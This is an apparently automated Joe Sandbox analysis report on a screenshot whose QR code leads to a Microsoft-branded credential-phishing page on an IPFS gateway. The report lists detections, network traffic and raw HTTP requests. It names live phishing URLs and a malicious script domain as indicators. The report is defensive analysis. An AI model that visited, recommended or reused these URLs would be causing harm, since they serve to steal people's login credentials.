Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2024-04-16_11h42_39.png

Overview

General Information

Sample name:	2024-04-16_11h42_39.png
Analysis ID:	1426615
MD5:	a900311b58ddd076cebb12bcf98b21e2
SHA1:	17e38bc13fb32228993320eea842797be742a8d4
SHA256:	5ccb7aa64e5dfa45703f73615f45b21f41cc34a7b71a419bb7b4cc1374117463
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

Creates files inside the system directory

HTML body contains low number of good links

HTML body contains password input but no form action

HTML body with high number of embedded images detected

HTML title does not match URL

IP address seen in connection with other malware

Invalid 'forgot password' link found

Invalid T&C link found

JA3 SSL client fingerprint seen in connection with other malware

Queries the volume information (name, serial number etc) of a device

Classification

×

Process Tree

System is w10x64

mspaint.exe (PID: 4872 cmdline: mspaint.exe "C:\Users\user\Desktop\2024-04-16_11h42_39.png" MD5: 986A191E95952C9E3FE6BE112FB92026)

chrome.exe (PID: 3468 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.qrfy.com/hbfzkBMQ4s MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 3092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=2072,i,2155693389170485184,14401983771675100146,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#	SlashNext: Label: Credential Stealing type: Phishing & Social Engineering
Source: https://cloudflare-ipfs.com/favicon.ico	URL Reputation: Label: malware

Multi AV Scanner detection for domain / URL

Source: thirdmandomavis.com	Virustotal: Detection: 15%			Perma Link
Source: cloudflare-ipfs.com	Virustotal: Detection: 12%			Perma Link
Source: https://thirdmandomavis.com/js.js	Virustotal: Detection: 15%			Perma Link
Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze	Virustotal: Detection: 11%			Perma Link

Phishing

Phishing site detected (based on image similarity)

Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#

Matcher: Found strong image similarity, brand: MICROSOFT

Phishing site detected (based on logo match)

Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#

Matcher: Template: microsoft matched

Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#

HTTP Parser: Number of links: 0

Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#

HTTP Parser: Total embedded image size: 46409

Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#

HTTP Parser: Title: Authenticating ... does not match URL

Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#

HTTP Parser: Invalid link: Forgot password?

Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#	HTTP Parser: Invalid link: Sites help you work on projects with your team and share information from anywhere on any device. Create or follow sites to see them here.
Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#	HTTP Parser: Invalid link: Terms of use
Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#	HTTP Parser: Invalid link: Privacy & cookies
Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#	HTTP Parser: Invalid link: Sites help you work on projects with your team and share information from anywhere on any device. Create or follow sites to see them here.
Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#	HTTP Parser: Invalid link: Terms of use
Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#	HTTP Parser: Invalid link: Privacy & cookies

Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#

HTTP Parser: <input type="password" .../> found

Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#	HTTP Parser: No favicon
Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#	HTTP Parser: No favicon

Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#	HTTP Parser: No <meta name="author".. found
Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#	HTTP Parser: No <meta name="author".. found

Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#	HTTP Parser: No <meta name="copyright".. found
Source: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze#	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.7:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.7:49741 version: TLS 1.2

Source: Joe Sandbox View	IP Address: 104.17.96.13 104.17.96.13
Source: Joe Sandbox View	IP Address: 104.17.24.14 104.17.24.14
Source: Joe Sandbox View	IP Address: 13.107.246.41 13.107.246.41
Source: Joe Sandbox View	IP Address: 13.107.246.41 13.107.246.41
Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.63.206.91
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157

Source: global traffic	HTTP traffic detected: GET /hbfzkBMQ4s HTTP/1.1Host: www.qrfy.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze HTTP/1.1Host: cloudflare-ipfs.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js.js HTTP/1.1Host: thirdmandomavis.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cloudflare-ipfs.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://cloudflare-ipfs.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cloudflare-ipfs.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cloudflare-ipfs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqzeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=s3ichK8dkqJvZNMs9dn1gFFNqF9_5M3Jc44bFurcULg-1713260639-1.0.1.1-8p6i8spHiCTCsdiMFuGlJcGUy.a20re65qf.8D3N9SpiolEvBDXTAYWFTKUTm9_bs0vBUDeEXvZknBej23D6LQ
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/6.1.1/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://cloudflare-ipfs.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://cloudflare-ipfs.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cloudflare-ipfs.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cloudflare-ipfs.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cloudflare-ipfs.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cloudflare-ipfs.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cloudflare-ipfs.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cloudflare-ipfs.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/6.1.1/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://cloudflare-ipfs.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pg2x9vAWVXfG9+A&MD=9Sc+AKcL HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pg2x9vAWVXfG9+A&MD=9Sc+AKcL HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: unknown

DNS traffic detected: queries for: www.qrfy.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 09:44:00 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 14Connection: closeServer: cloudflareCF-RAY: 87533bfc988953c7-ATLalt-svc: h3=":443"; ma=86400

Source: chromecache_59.3.dr	String found in binary or memory: https://cdn.socket.io/4.6.0/socket.io.min.js
Source: chromecache_67.3.dr	String found in binary or memory: https://fontawesome.com
Source: chromecache_67.3.dr	String found in binary or memory: https://fontawesome.com/license/free

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
